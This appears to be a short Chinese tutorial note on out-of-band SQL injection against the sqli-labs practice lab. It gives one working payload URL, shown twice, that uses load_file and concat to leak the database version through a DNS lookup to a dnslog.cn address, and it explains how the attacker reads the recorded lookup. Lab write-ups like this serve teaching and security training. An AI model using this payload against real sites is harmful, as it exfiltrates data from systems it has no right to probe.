sql 注入 - 带外攻击
- 带外攻击:
http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",version(),".fhig24.dnslog.cn\\1.txt")) -- -
带外攻击用到了load_file这个函数,利用load_file这个函数读取网络文件,其中访问的 记录会被记录下来,其中就用到了dnslog.cn这个记录了dns浏览记录的网站,通过这 个网站可以让它回显我们想要的内容
http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",version(),".fhig24.dnslog.cn\\1.txt")) -- -
带外攻击用到了load_file这个函数,利用load_file这个函数读取网络文件,其中访问的 记录会被记录下来,其中就用到了dnslog.cn这个记录了dns浏览记录的网站,通过这 个网站可以让它回显我们想要的内容